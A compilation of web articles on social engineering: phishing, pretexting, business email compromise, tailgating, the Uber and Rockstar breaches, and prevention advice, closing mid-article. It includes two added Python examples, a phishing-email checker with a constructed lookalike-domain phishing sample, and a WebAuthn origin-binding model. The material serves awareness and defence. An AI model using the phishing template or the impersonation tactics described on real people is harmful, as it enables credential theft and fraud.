Act like you’re in charge. Most of us are primed to respect authority, or, as it turns out, to respect people who act like they have the authority to do what they’re doing. You can exploit varying degrees of knowledge of a company’s internal processes to convince people that you have the right to be places or see things that you shouldn’t, or that a communication coming from you is really coming from someone they respect. For instance, in 2015 finance employees at Ubiquiti Networks wired millions of dollars in company money to scam artists who were impersonating company executives, probably using a lookalike domain in their email address. On the lower tech side, investigators working for British tabloids in the late ’00s and early ’10s often found ways to get access to victims’ voicemail accounts by pretending to be other employees of the phone company via sheer bluffing; for instance, one PI convinced Vodafone to reset actress Sienna Miller’s voicemail PIN by calling and claiming to be “John from credit control.”

Sometimes it’s external authorities whose demands we comply with without giving it much thought. Hillary Clinton campaign honcho John Podesta had his email hacked by Russian spies in 2016 when they sent him a phishing email disguised as a note from Google asking him to reset his password. By taking action that he thought would secure his account, he actually gave his login credentials away.

Types of social engineering

  • Phishing, as we noted above, which also includes text-based smishing and voice-based vishing. These attacks are often low-effort but widely spread; for instance, a phisher might send out thousands of identical emails, hoping someone will be gullible enough to click on the attachment.
  • Spear phishing is a “high-touch” variation of phishing aimed at a specific, high-value target; when that target is a senior executive it is usually called whaling. Attackers spend time researching their victim, who’s usually a high-status person with a lot of money they can be separated from, in order to craft unique and personalized scam communications.
  • Baiting is a key part of all forms of phishing and other scams as well—there’s always something to tempt the victim, whether a text with a promise of a free gift card or something much more lucrative or salacious.
  • Pretexting involves creating a story, or pretext, to convince someone to give up valuable information or access to some system or account. A pretexter might manage to find some of your personally identifying information and use it to trick you—for instance, if they know what bank you use, they might call you up and claim to be a customer service rep who needs to know your account number to help with a late payment. Or they could use the information to imitate you—this was the technique used by those HP PIs we discussed above .
  • Business email compromise (BEC), also known as CEO fraud, combines several of the above techniques. An attacker either gains control of a victim’s email address or manages to send emails that look like they’re from that address, then starts sending emails to subordinates at work requesting the transfer of funds to accounts they control.


  • In a quid pro quo attack, a hacker offers something in exchange for access or information. A tech support scam is a typical example of a quid pro quo attack.
  • Tailgating is an in-real-life form of social engineering in which an attacker tricks an employee into letting them follow them into the building, hence ‘tailgating.’ This is achieved, for example, by pretending to be a delivery person or an employee who forgot their badge, and it takes advantage of the human desire to be helpful and nice.

How to spot social engineering attacks

The security company Norton has done a pretty good job of outlining some red flags that could be a sign of a social engineering attack . These apply across social and technological techniques, and are good to keep in the back of your mind as you try to stay on guard:

  • Someone you know sends an unusual message: Stealing or mimicking someone’s online identity and then mining their social circles is relatively easy for a determined attacker, so if you get a message from a friend, relative, or coworker that seems off, be very sure you’re really talking to them before you act on it. It’s possible that your granddaughter really is on a vacation she didn’t tell you about and needs money, or that your boss really does want you to wire a six-figure sum to a new supplier in Belarus, but that’s something for you to triple-check before you hit send.
  • A stranger is making an offer that’s too good to be true: Again, we all laugh at the Nigerian prince emails, but many of us still fall for scams that trick us by telling us we’re about to get something we never expected and never asked for. Whether it’s an email telling you won a lottery you didn’t enter or a text from a weird number offering you a free gift card just for paying your phone bill on time, if it feels too good to be true, it probably is.
  • Your emotions are heightened and you have to act now: Social engineering scammers play on strong emotions—fear, greed, empathy—to inculcate a sense of urgency specifically so you don’t stop to think twice about scenarios like the ones we just outlined. A particularly pernicious technique in this realm is a tech support scam, which preys on people who are already nervous about hacks but not very tech savvy: you hear from an aggressive person who claims to be from Google or Microsoft, tells you that your system has been compromised, and demands that you change your passwords right away—tricking you into revealing your credentials to them in the process.

How to avoid being a victim of social engineering

Fighting against all of these techniques requires vigilance and a zero-trust mindset. That can be difficult to inculcate in ordinary people; in the corporate world, security awareness training is the number one way to prevent employees from falling prey to high-stakes attacks. Employees should be aware that social engineering exists and be familiar with the most commonly used tactics.

Some basic tips to avoid falling victim to social engineering attacks include:

  • Resist the urge to click links in a suspicious email.
  • Check the Web address of a link (by placing your mouse cursor over the link) and the sender’s email address before visiting the destination website.
  • Visit websites directly rather than clicking links in emails.
  • Be cautious of email attachments, even if it looks like it’s from a familiar sender.
  • Check for signs such as poor quality of the logo or email, poor grammar or misspellings.
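The second and fourth tips above (check the link and the sender's address before acting) and the lookalike-domain trick described under business email compromise can be automated for the inbound mail a help desk triages. The following Python is an added example, not code from the original article: it parses a message and reports the mismatches a reader is told to look for. The sample message is constructed for the example; OUR_DOMAIN, the homoglyph table and the urgency word list are assumptions.

```python
import email
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

OUR_DOMAIN = "example-corp.com"   # assumed: the organisation's own mail domain
URGENCY_WORDS = ("action required", "urgent", "immediately", "expires", "suspended")
# Digits that phishers substitute for letters in lookalike domains (examp1e, c0rp).
HOMOGLYPHS = str.maketrans({"1": "l", "0": "o", "3": "e", "5": "s", "|": "l"})

# Constructed sample, not a real capture: the display name says IT, the address is on a
# lookalike domain, Reply-To goes elsewhere again, and the link text does not match the href.
SAMPLE_EML = """\
From: IT Support <helpdesk@examp1e-corp.com>
Reply-To: tickets@mail-examp1e.net
To: alice@example-corp.com
Subject: Action required: password expires today
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Your password expires in 2 hours. Reset it now:</p>
<a href="https://login.examp1e-corp.com/reset?u=alice">https://login.example-corp.com/reset</a>
<p>Regards, IT</p>
</body></html>
"""


class LinkCollector(HTMLParser):
    """Collects (href, visible text) pairs from <a> tags."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def domain_of(addr):
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def normalise(host):
    """Undo the common digit-for-letter substitutions before comparing with OUR_DOMAIN."""
    return host.translate(HOMOGLYPHS)


def check_message(raw):
    """Return a list of findings for one RFC 5322 message; empty means nothing odd."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    _, from_addr = parseaddr(str(msg["From"] or ""))
    from_domain = domain_of(from_addr)
    if from_domain != OUR_DOMAIN and normalise(from_domain) == OUR_DOMAIN:
        findings.append(f"sender domain {from_domain} is a lookalike of {OUR_DOMAIN}")
    _, reply_addr = parseaddr(str(msg["Reply-To"] or ""))
    if reply_addr and domain_of(reply_addr) != from_domain:
        findings.append(f"Reply-To domain {domain_of(reply_addr)} differs from sender domain")
    if any(w in str(msg["Subject"] or "").lower() for w in URGENCY_WORDS):
        findings.append("urgency language in subject")
    body = msg.get_body(preferencelist=("html",))
    if body is not None:
        collector = LinkCollector()
        collector.feed(body.get_content())
        for href, text in collector.links:
            # The hover check from the tips: displayed URL versus real destination.
            if text.startswith(("http://", "https://")) and host_of(text) != host_of(href):
                findings.append(f"link text shows {host_of(text)} but points to {host_of(href)}")
            if host_of(href) != OUR_DOMAIN and not host_of(href).endswith("." + OUR_DOMAIN):
                findings.append(f"link to external host {host_of(href)}")
    return findings
```

Run `check_message(SAMPLE_EML)` and every trick in the sample is reported: the lookalike sender domain, the divergent Reply-To, the urgency wording, the link whose text and destination disagree, and the external destination itself. A clean internal message produces an empty list. The homoglyph table is deliberately small; a production filter would compare against a registered lookalike list and the public suffix list rather than a handful of substitutions.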

Fortunately, social engineering awareness lends itself to storytelling. And stories are much easier to understand and much more interesting than explanations of technical flaws. Quizzes and attention-grabbing or humorous posters are also effective reminders about not assuming everyone is who they say they are.

But it isn’t just the average employee who needs to be aware of social engineering. As we saw, social engineers focus on high-value targets like CEOs and CFOs. Senior leadership often resists going to the trainings mandated for their employees, but they need to be aware of these attacks more than anyone.

How to defend against social engineering

CSO contributor Dan Lohrmann offers the following advice:

  • Train and train again when it comes to security awareness. Ensure that you have a comprehensive security awareness training program in place that is regularly updated to address both the general phishing threats and the new targeted cyberthreats. Remember, this is not just about clicking on links.
  • Provide a detailed briefing “roadshow” on the latest online fraud techniques to key staff. Yes, include senior executives, but don’t forget anyone who has authority to make wire transfers or other financial transactions. Remember that many of the true stories involving fraud occur with lower-level staff who get fooled into believing an executive is asking them to conduct an urgent action — usually bypassing normal procedures and/or controls.
  • Review existing processes, procedures, and separation of duties for financial transfers and other important transactions. Add extra controls, if needed. Remember that separation of duties and other protections may be compromised at some point by insider threats, so risk reviews may need to be reanalyzed given the increased threats.
  • Consider new policies related to “out of band” transactions or urgent executive requests. An email from the CEO’s Gmail account should automatically raise a red flag to staff, but they need to understand the latest techniques being deployed by the dark side. You need authorized emergency procedures that are well-understood by all.
  • Review, refine and test your incident management and phishing reporting systems. Run a tabletop exercise with management and with key personnel on a regular basis. Test controls and reverse-engineer potential areas of vulnerability.

Social engineering statistics

Business email compromise (BEC) attacks comprise 50% of all social engineering (source: Verizon’s DBIR for 2023).

$50 billion was lost to BEC attacks between October 2013 and December 2022 (source: FBI )

Smishing comprises 39% of mobile threats (source: SlashNext )

Social engineering attacks increased 45% in 2023, coincident with the launch of ChatGPT (source: SlashNext )

At 17% of all intrusions, phishing is the second most common initial infection vector for malware (source: Mandiant’s M-Trends 2024 report.)

Social engineering resources

A number of vendors offer tools or services to help conduct social engineering exercises, and/or to build employee awareness via means such as posters and newsletters.

Also worth checking out is the Social-Engineer Toolkit (SET), an open-source tool long associated with social-engineer.org and maintained by TrustedSec, which is a free download. The toolkit helps automate penetration testing via social engineering, including spear phishing attacks, creation of legitimate-looking websites, USB drive-based attacks, and more.

Another good resource is The Social Engineering Framework .

Currently, the best defense against social engineering attacks is user education and layers of technological defenses to better detect and respond to attacks. Detection of key words in emails or phone calls can be used to weed out potential attacks, but even those technologies will probably be ineffective in stopping skilled social engineers.

Josh Fruhlinger is a writer and editor who lives in Los Angeles.


Social Engineering: How A Teen Hacker Allegedly Managed To Breach Both Uber And Rockstar Games


Rockstar Games—the developers of the popular Grand Theft Auto series of video games—was hacked just days after ride-hailing giant Uber’s servers were targeted in a similar breach, purportedly by the same hacker who used a process called social engineering, a highly effective mode of attack that relies on deceiving employees of a targeted company and can be difficult to guard against.

An alleged teenage hacker managed to breach the internal database of Rockstar Games and leaked videos of an unannounced sequel to the blockbuster Grand Theft Auto video game franchise.

Similar to the Uber hack , the hacker who goes by the alias “TeaPot” alleged he gained access to Rockstar Games’ internal messages on Slack and early code for their unannounced Grand Theft Auto sequel by gaining access to an employee's login credentials.

While the exact details of the Rockstar breach are unclear, in Uber’s case the hacker claimed he masqueraded as a company IT person and convinced an employee to share their login credentials.

Unlike other modes of attacks that rely on flaws in a company’s security architecture, social engineering targets people and relies on manipulation and deception.

Experts contend that humans still remain the “weakest link” in cybersecurity as they can be easily deceived to click on malicious links or share their login credentials.

Social engineering can also defeat some multifactor authentication methods, such as text-message codes, one-time passwords, and push approvals, because the victim can be talked into reading out the code or approving the prompt.

Crucial Quote

Rachel Tobac, the CEO of cybersecurity firm SocialProof Security and an expert on social engineering tweeted : “The hard truth is that most [organizations] in the world could be hacked in the exact way Uber was just hacked…Many [organizations] still don’t use [Multi Factor Authentication] internally…& don’t use password managers (which leads to saving creds in easily searchable places once an intruder gets in).”

Key Background

Social engineering has been used to carry out several high-profile hacks in recent years, including the hijacking of more than 100 prominent Twitter accounts—among them Elon Musk, former President Barack Obama, Bill Gates and Kanye West—which were then used to promote a bitcoin scam. The hacks were carried out by teenagers who managed to gain access to Twitter’s internal networks by targeting “a small number of employees” according to the social media company. Last month, both Cloudflare and Twilio were also targeted in a type of social engineering attack called “phishing” where employees were tricked into opening a message that was disguised to appear as legitimate company communication but included a malicious link. Twilio, which provides messaging and two-factor authentication services, disclosed that the hackers had managed to breach the company's internal databases and gained access to an undisclosed number of customer accounts. Cloudflare, an online content delivery network, noted the hackers were not able to access its internal network.

Unlike Twilio, Uber and Rockstar, which had their internal systems breached, Cloudflare avoided this fate because it uses hardware-based security keys . Unlike text messages and one-time passwords, hardware security keys hold up against social engineering. A targeted employee can be tricked into reading out a text message or a one-time code, but a security key never produces a reusable secret: it signs a login challenge that is bound to the web origin that requested it, so a signature obtained by a lookalike phishing site is useless at the real one, and an attacker would need physical possession of the key to do any better. Hardware security keys come in various forms, including USB sticks and Bluetooth or NFC dongles, and they must be plugged into or paired with the device that is signing in. Hackers who obtain employee credentials cannot get into accounts protected this way without also getting hold of the key. In 2018, Google said that none of its more than 85,000 employees had been successfully phished since it mandated physical security keys a year earlier.
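The origin binding behind that paragraph, as an added Python model that is not from the Forbes article and is not code from Cloudflare, Google or any FIDO implementation: it runs a legitimate login, the same login attempted from a lookalike phishing origin, a forged origin inside the signed data, and, for contrast, a TOTP code relayed the way an attacker relays it. HMAC with a per-site secret stands in for the key's private-key signature so the example runs with the standard library alone; the origins, rpId and secrets are made up.

```python
import hashlib
import hmac
import json
import os
import time
from urllib.parse import urlparse

# Toy model of FIDO2/WebAuthn origin binding. HMAC with a per-site secret stands in for the
# key's private key; what gets signed (rpIdHash plus the hash of clientData, which carries
# the page origin) follows the spec, which is what makes relayed logins fail.


class Authenticator:
    """Stand-in for a hardware key: one secret per relying party. The 'public key' returned
    by register() is the same secret, an HMAC simplification; real keys export a public key."""
    def __init__(self):
        self._keys = {}

    def register(self, rp_id):
        secret = os.urandom(32)
        self._keys[rp_id] = secret
        return hashlib.sha256(secret).hexdigest(), secret

    def sign(self, rp_id, client_data_hash):
        auth_data = hashlib.sha256(rp_id.encode()).digest()        # rpIdHash
        sig = hmac.new(self._keys[rp_id], auth_data + client_data_hash, "sha256").digest()
        return auth_data, sig


def browser_get_assertion(authenticator, origin, rp_id, challenge):
    """navigator.credentials.get() as the browser enforces it: rpId must be the page's host or
    a registrable suffix of it, and clientData.origin is where the page really loaded from."""
    host = urlparse(origin).hostname or ""
    if not (host == rp_id or host.endswith("." + rp_id)):
        raise ValueError(f"rpId {rp_id} is not valid for origin {origin}")
    client_data = json.dumps({"type": "webauthn.get", "challenge": challenge,
                              "origin": origin}, sort_keys=True).encode()
    auth_data, sig = authenticator.sign(rp_id, hashlib.sha256(client_data).digest())
    return client_data, auth_data, sig


class RelyingParty:
    def __init__(self, origin, rp_id):
        self.origin, self.rp_id = origin, rp_id
        self.creds, self.challenges = {}, set()

    def register(self, authenticator):
        cred_id, key = authenticator.register(self.rp_id)
        self.creds[cred_id] = key
        return cred_id

    def new_challenge(self):
        c = os.urandom(16).hex()
        self.challenges.add(c)
        return c

    def verify(self, cred_id, client_data, auth_data, sig):
        """'ok', or the reason the assertion was rejected (checks in spec order)."""
        cd = json.loads(client_data)
        if cd.get("type") != "webauthn.get":
            return "wrong ceremony type"
        if cd.get("challenge") not in self.challenges:
            return "unknown or replayed challenge"
        if cd.get("origin") != self.origin:                     # the anti-phishing check
            return f"origin mismatch: {cd.get('origin')}"
        if auth_data != hashlib.sha256(self.rp_id.encode()).digest():
            return "rpIdHash mismatch"
        expected = hmac.new(self.creds[cred_id],
                            auth_data + hashlib.sha256(client_data).digest(), "sha256").digest()
        if not hmac.compare_digest(expected, sig):
            return "bad signature"
        self.challenges.discard(cd["challenge"])                # single use
        return "ok"


def totp(secret, t, step=30, digits=6):
    """RFC 6238 TOTP (HMAC-SHA1, 30-second step), used for contrast only."""
    mac = hmac.new(secret, int(t // step).to_bytes(8, "big"), "sha1").digest()
    off = mac[-1] & 0x0F
    return f"{(int.from_bytes(mac[off:off + 4], 'big') & 0x7FFFFFFF) % 10 ** digits:0{digits}d}"


def run_scenarios(phish_origin="https://accounts-example.com"):
    """Legit login, the same login relayed through a lookalike page, a forged origin, and a
    relayed TOTP code. Returns the four outcomes as strings."""
    auth = Authenticator()
    rp = RelyingParty("https://accounts.example.com", "example.com")
    cred_id = rp.register(auth)
    legit = rp.verify(cred_id, *browser_get_assertion(auth, rp.origin, rp.rp_id, rp.new_challenge()))
    try:   # victim's own browser on the phishing page, real challenge relayed by the attacker
        relayed = rp.verify(cred_id, *browser_get_assertion(auth, phish_origin, rp.rp_id, rp.new_challenge()))
    except ValueError as e:
        relayed = f"browser refused: {e}"
    # Even if a client skipped that check, the origin inside the signed clientData gives it away.
    cd, ad, sig = browser_get_assertion(auth, rp.origin, rp.rp_id, rp.new_challenge())
    forged = rp.verify(cred_id, cd.replace(b"accounts.example.com", b"accounts-example.com"), ad, sig)
    # TOTP carries no origin: a code typed into the phishing page works seconds later at the real site.
    shared, now = os.urandom(20), int(time.time() // 30) * 30
    relayed_totp = "ok" if hmac.compare_digest(totp(shared, now), totp(shared, now + 5)) else "rejected"
    return {"legit": legit, "relayed": relayed, "forged": forged, "totp_relay": relayed_totp}
```

`run_scenarios()` returns `ok` for the genuine login, a browser refusal for the lookalike origin, `origin mismatch` for the forged clientData, and `ok` for the relayed TOTP code, which is the whole difference between the two factor types in four lines of output. The model omits counters, user-presence flags and attestation; it is the origin field and the single-use challenge that matter for this page's argument.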

323,972. That is the total number of complaints of social engineering attacks received by the FBI in 2021—almost three times higher than what it was in 2019—according to the agency’s annual Internet Crime Report . During this period, hackers managed to steal a total of $2.4 billion by compromising business email accounts through social engineering techniques.

What To Watch For

Bloomberg’s Jason Schreier speculated the recent hack may prompt Rockstar to place restrictions on remote work. Cybersecurity experts have previously argued that remote work may require more precautions as it leaves employees more vulnerable to social engineering attacks.

Further Reading

Uber Says It’s Responding To ‘Cybersecurity Incident’ After Alleged Hack Of Internal Databases (Forbes)

Uber Hacker Claims To Have Hacked Rockstar Games, Releases GTA 6 Videos (Forbes)

FBI Probes Uber & GTA 6 Hacks, U.K. Teen Extortion Gang Leader Suspected (Forbes)

Siladitya Ray


What is social engineering definition + attack examples.

Abi Tyas Tunggal

Social Engineering, in the context of cybersecurity, is the process of tricking people into divulging private information that can be useful in a cyberattack.

There are many different types of social engineering attacks. Some forms of social engineering are convincing emails or text messages infected with links leading to malicious websites. Others involve more effort, like a phone call from a cybercriminal pretending to be tech support requesting confidential information.

Social engineering attacks are popular because they help cybercriminals avoid the arduous effort of locating and exploiting security vulnerabilities to access a network. Instead, manipulated employees essentially hand threat actors the keys to the network.

Because they make cyberattacks significantly easier, social engineering attacks are growing in popularity. According to the State of Cybersecurity Survey by ISACA , social engineering was the number one cyber threat responsible for business compromise.


13 Examples of Social Engineering Techniques

Common social engineering attacks include:

Baiting

Baiting is a type of social engineering where an attacker leaves a physical device (like a USB drive) loaded with malware in a place where it is likely to be found. When a victim plugs the USB drive into their computer, the malware installs itself.

Diversion Theft

Diversion theft is when social engineers trick a delivery company into sending the package to a different location so that it can be intercepted.

Honey Trap

A honey trap is when a con artist poses as an attractive person online with the objective of stealing personally identifiable information (PII) , like phone numbers and email account details, from the individuals they interact with.

Phishing

Phishing attacks gather sensitive information like login credentials, credit card numbers, and bank account details by masquerading as a trusted source.

The most common phishing scam is a fake email that seems like it was sent by an authoritative sender.

Here's an example of a phishing email that looks like a legitimate communication from the World Health Organization.

phishing email example

The links in phishing emails lead to attacker-controlled pages. When clicked, victims are usually directed to a web page that's a replica of the business website the email is claiming to represent. This could be a fake login page for a financial institution or a fake login portal for your intranet.

Some of these fake pages are indistinguishable from their real-world inspirations. When unsuspecting victims submit their information, their credentials are sent to the hacker who then logs into the legitimate website being mirrored in the attack.

Phishing emails often create a sense of urgency to make the victim feel that divulging information quickly is important. Despite not always having a sophisticated design, phishing attacks are one of the most critical cybersecurity risks .

Some spam filters, such as Microsoft's filter , are designed to send potential phishing emails directly to the junk folder. These filters are not always accurate, so it's important to maintain a zero-trust mindset when reviewing incoming emails.

Spear Phishing

Spear phishing is an email spoofing attack targeting a specific organization or individual. Spear phishing emails aim to infect the victim with ransomware or trick them into revealing sensitive data.

Smishing

Smishing or SMS phishing is phishing performed over SMS rather than the traditional medium of email.

Pretexting

Pretexting is the process of lying to gain access to personal data or other privileged information. For example, a fraudster may pose as a third-party vendor , saying they need to know your full name and title to verify your identity.

Quid Pro Quo

A quid pro quo is a type of social engineering attack that exploits the human tendency to reciprocate good gestures.

For example, an attacker may provide free technical support over a phone call to a victim and then request that they turn off their antivirus to support an upcoming system update. The victim is then pressured to oblige to reciprocate the generous assistance they were given.

If a victim is very accommodating, cybercriminals will continue using them to advance the cyberattack. Following on from the above example, after turning off all antivirus software the victim could then be asked to install a trojan masking as the "software update", leading to the entire network falling under the cybercriminal's control.

Rogue Security Software

Rogue security software or scareware is fake security software that falsely identifies the presence of malware on a computer. After "detection" the end-user receives a pop-up requesting payment for removal. Pop-ups will continue happening with increasing urgency until payment is made.

Tailgating

Tailgating or piggybacking is when an attacker follows a person into a secure area. This type of attack relies on the person being followed assuming the intruder is authorized to access the targeted area.

Vishing

Vishing or voice phishing is conducted by phone and often targets users of Voice over IP (VoIP) services like Skype . Vishing paired with voice deep fakes is a massive cybersecurity risk . According to The Wall Street Journal , a vishing attack resulted in the CEO of a UK-based energy firm sending $243,000 to an attacker's bank account because he thought he was on the phone with his boss.

Waterholing

A watering hole attack is when an attacker targets a specific group of people by infecting a website they know and trust. The attack could involve exploiting an outdated SSL certificate , typosquatting , lack of DNSSEC , or domain hijacking .

Whaling

Whaling is a form of spear phishing targeting high-profile individuals like public company executives, politicians or celebrities. For example, whaling attacks often come in the form of a fake request from the CEO asking the HR department to change their existing payroll details to those set up by the phisher.

4 Examples of Popular Social Engineering Attacks

The trojan horse.

The most famous social engineering attack comes from an Ancient Greek story of deception. An army of soldiers hid inside a wooden horse that was given as a peace offering to the city of Troy. Troy accepted the gift, and that night the soldiers snuck out and conquered the city.

The modern Trojan operates under the same principle. Cybercriminals present seemingly innocuous software solutions, like a virus scanner or software update, that contains a hidden malware installer.

RSA Data Breach

A successful social engineering attack led to the 2011 data breach of RSA. Attackers sent two phishing emails over two days to a group of RSA employees with the subject line of "2011 Recruitment Plan." When opened, an infected Excel document exploited an Adobe Flash vulnerability (CVE-2011-0609).

Target Data Breach

In 2013, Target suffered a massive data breach which started with a third-party vendor falling for a phishing email. The email contained a trojan that helped attackers gain access to Target's POS system, resulting in the theft of 40 million credit card details.

Mispadu: Malvertising for Fake McDonald's Coupons

A bank credential-stealing trojan known as Mispadu was deployed via Facebook ads for fake McDonald's coupons. The ads targeted residents in Brazil and Mexico. When users attempted to access the coupons, a zip file containing the trojan was downloaded and installed on their computer.

Mispadu malvertising campaign - Source: welivesecurity.com

Mispadu scans web browsers, email clients, and even the clipboard database for banking credential information. The trojan also attempts to replace existing bitcoin wallets with its own wallet.

12 Ways to Prevent Social Engineering Attacks in 2022

You and your employees will have the best chances of evading social engineering attacks by following these 12 prevention strategies.

1. Educate Employees

Ignorance is the primary reason employees fall victim to social engineering attacks. Organizations should implement security awareness training to educate their staff about how to respond to common breach attempts, for example, what to do when private information is requested or when someone attempts to tailgate an employee into the office.

The following list outlines some of the most common cyberattacks. Each link will open a blog post that can be used for cybercrime awareness training in the workplace:

  • Phishing attacks
  • DDoS attacks
  • Ransomware attacks
  • Malware attacks
  • Clickjacking attacks
  • How to respond to tailgating

2. Establish Security Policies

Outline how all employees should respond to social engineering attempts in your information security policy and incident response plan . By ensuring everyone follows the best response practices, you'll have the highest chances of defending against these attacks.

3. Scrutinize All Information

Teach employees to scrutinize every email they receive and every device they plug into their computer. Identifying what information is sensitive and evaluating how it could be exposed during a social engineering attack can help organizations build in countermeasures and mitigate cybersecurity risk .

4. Establish Security Protocols

Establish an information risk management program that has security protocols, policies, and procedures that outline how to handle data security .

5. Test Attack Resilience

Test your organization by performing controlled social engineering attacks against it. Send fake phishing emails and gently correct staff members who click malicious links, open attachments, or respond. These events should be viewed as teachable moments rather than cybersecurity failures.

6. Increase Test Attacks

Just like a vaccination, your organization can become more resistant to social engineering attacks if it is exposed to them frequently. This is why testing multiple times a year is important.

7. Review Response Protocols

Review your countermeasures and training against social engineering attacks over time and improve or discard outdated information.

8. Secure All Waste

Use a secure waste management service so that attackers can't plan attacks by studying information in either physical or digital dumpsters.

9. Use Multi-Factor Authentication

Enforce a multi-factor authentication process that requires users to know something (a password), have something (a token), and be something (biometrics) before access to sensitive resources is granted.

10. Operations Security

OPSEC is a process that identifies friendly actions that could be useful to a potential attacker. Properly analyzed and grouped with other data, such actions can reveal critical information or sensitive data. By employing OPSEC practices, you can reduce the amount of information social engineers can gather.

11. Implement a Third-Party Risk Management Framework

It's no longer enough to focus solely on your own organization's cyber resilience and cybersecurity. Third-party vendors are increasingly processing large amounts of client personally identifiable information (PII) and protected health information (PHI), which makes them prime targets for social engineers after your data.

Develop a third-party risk management framework and vendor management policy, and perform a cybersecurity risk assessment before onboarding new vendors or continuing to use existing vendors. It's much easier to prevent data breaches than to clean them up, especially after stolen data has been sold on the dark web. Look for software that can automate vendor risk management and continuously monitor and rate your vendors' cybersecurity rating.

12. Detect Data Leaks

It can be hard to know when credentials have been exposed during a phishing attack. Some phishers may wait months or years to use the credentials they collect, which is why your organization should be continuously scanning for data exposures and leaked credentials .

Why Do Cybercriminals Use Social Engineering?

Cybercriminals use social engineering techniques to conceal their true identity and present themselves as trusted sources or individuals. The objective is to influence, manipulate or trick victims into giving up personal information so that it can be used to access a targeted network.

Most social engineering exploits people's willingness to be helpful. For example, the attacker may pose as a co-worker who has an urgent problem, like an overdue invoice that needs to be paid.

Social engineering is an increasingly popular way to subvert information security because it is often easier to exploit human weaknesses than network security or vulnerabilities. This is why social engineering is often used as the first stage of a larger cyber attack designed to infiltrate a system, install malware or expose sensitive data.

How Does Social Engineering Work?

The first step for most social engineering attacks is to gather information on the target.

For example, if the target is an organization, attackers can exploit poor OPSEC practices to gather intelligence on corporate structure, internal operations, industry jargon, and third-party vendors. Public-facing information, such as social media profiles, is also targeted.

When cyber attackers are ready to strike their first target is usually a low-level employee who's manipulated to achieve network access. The objective of this step is to avoid contending with firewalls and other security controls located at the network boundary.

Threat actors can rarely instantly exploit sensitive resources when they first gain access to a network. To burrow deeper, they move laterally inside the network in search of higher privilege credentials to compromise. This activity is usually hidden behind legitimate processes to evade antivirus detection.


Social engineering attacks expose sensitive information, like social security numbers or credit card numbers, and lead to data breaches and data leaks of personally identifiable information (PII) and protected health information (PHI).

What are the Six Principles of Influence Abused in Social Engineering?

All social engineering tactics rely on exploiting aspects of human interaction and decision-making known as cognitive biases. Think of biases as vulnerabilities in 'human software' that can be exploited, just like CVEs can be exploited to access a private network.

The social engineering framework is based on the six principles of influence outlined by Robert Cialdini, Professor Emeritus of Psychology and Marketing at Arizona State University.

1. Reciprocity

People tend to want to return a favor, which explains the pervasiveness of free samples in marketing. A scammer may give the target something for free and then request access to sensitive information.

Social engineering example of reciprocity:

An attacker's demonstration of kindness makes a victim feel compelled to echo the sentiment by complying with sensitive data requests.

2. Commitment and Consistency

If people commit, either vocally or in writing, to a goal or idea, they're more likely to honor the commitment, even if the original motivation is removed.

Social engineering example of commitment and consistency:

An employee follows through with an attacker's request for login credentials because they originally agreed to supply it, even if they understand it shouldn't be done.

3. Social Proof

People tend to do things other people are doing.

Social engineering example of social proof:

An attacker provides false evidence that a victim's colleague has collaborated with them recently, compelling the victim to also comply.

4. Authority

People tend to obey authority figures even if asked to do objectionable acts. This is why spear-phishing campaigns that impersonate a CEO and target low-level employees of the same company are usually successful.

Social engineering example of authority:

An attacker poses as an authoritative figure, either within the targeted workplace or in society, such as a police officer, lawyer, etc.

5. Liking

People are easily persuaded by people they like. This is why spear phishers often masquerade as a colleague or friend in their campaigns.

Social engineering example of liking:

An attacker compliments a victim to seem likable.

6. Scarcity

Perceived scarcity increases demand. This scarcity tactic makes social engineering attacks feel very urgent, and therefore, important.

Social engineering example of scarcity:

An attacker presents an urgent need for a set of credentials in order to access internal software and complete an expiring sales call.

4 Examples of Notable Social Engineers

Notable social engineers include:

Kevin Mitnick

Based in the United States, Mitnick is a computer security consultant, author, and hacker, best known for his high-profile arrest in 1995 and five-year conviction for various computer and communications-related crimes.

In the video below Kevin describes how he used social engineering to exploit the paper ticketing system of an L.A. bus network at 12 years of age.

Susan Headley

During the late 1970s and early 1980s, Susan Headley (or Susan Thunder, as she was known) became famous for her expertise in social engineering, pretexting, and psychological subversion.

Learn more about Susan Headley.

Badir Brothers

Ramy, Muzher and Shaddle Badir, brothers who were all blind from birth, set up an extensive phone and computer fraud scheme in Israel in the 1990s. The operation combined social engineering, vishing, and Braille-display computers.

Learn more about the Badir Brothers.

Frank Abagnale

Frank Abagnale is an American security consultant known for his background as a former con man, check forger, and impostor between the ages of 15 and 21.

His tactics and escapades are depicted in the best-selling novel and movie Catch Me If You Can. This publicity arguably makes Abagnale the world's most famous social engineer.

Learn more about Frank Abagnale.


Social Engineering: Definition, Examples, Types of Attacks and How to Prevent Them


Nick Harrahill

Director of Support

What is social engineering?


Social engineering has become one of the most efficient attack vectors for cybercriminals. This article unpacks its types, techniques, and stages and provides the best methods to minimize the associated risks.

The term ‘social engineering’ is used in IT security and political science. In both fields, it means influencing the minds of humans to control them. People subject to social engineering are seen as justifiable targets of instrumentalization and manipulation.

In IT security, social engineering is a body of psychological manipulation methods to induce a specific target’s behavior.

Usually, it is a part of a ‘larger’ criminal scheme. The purpose of this crime is to obtain access to data that can be used to obtain money or achieve other goals. Social engineering attacks can happen both online and offline, the former bearing fewer risks for attackers.

For this article, we will differentiate between three terms:

  • The target of social engineering attacks is the person that is being manipulated.
  • The ‘victim’ is the entity (a person or organization they work at) harmed by the crime.
  • The ‘victim by proxy’ is any third-party entity (person or organization) that was harmed as a result of the cybercrime.

Sometimes the victim and the target are the same person. For example, social engineers pretend to be an employee of a target bank and obtain the target’s credentials. Then they steal money from the target’s account. This happens mostly in cybercrime incidents against individuals.

In more complex schemes, the victim is usually an organization, and the target is its employee. For example, a double extortion ransomware attack uses social engineering against an employee to infect the IT environment of a company. In this case, the 'victim by proxy' is a client of the company whose data was stolen by criminals and sold on the Dark Web.

Note this article’s scope is social engineering as an IT security phenomenon with a focus on cybercrime against organizations.

What are the origins of social engineering?

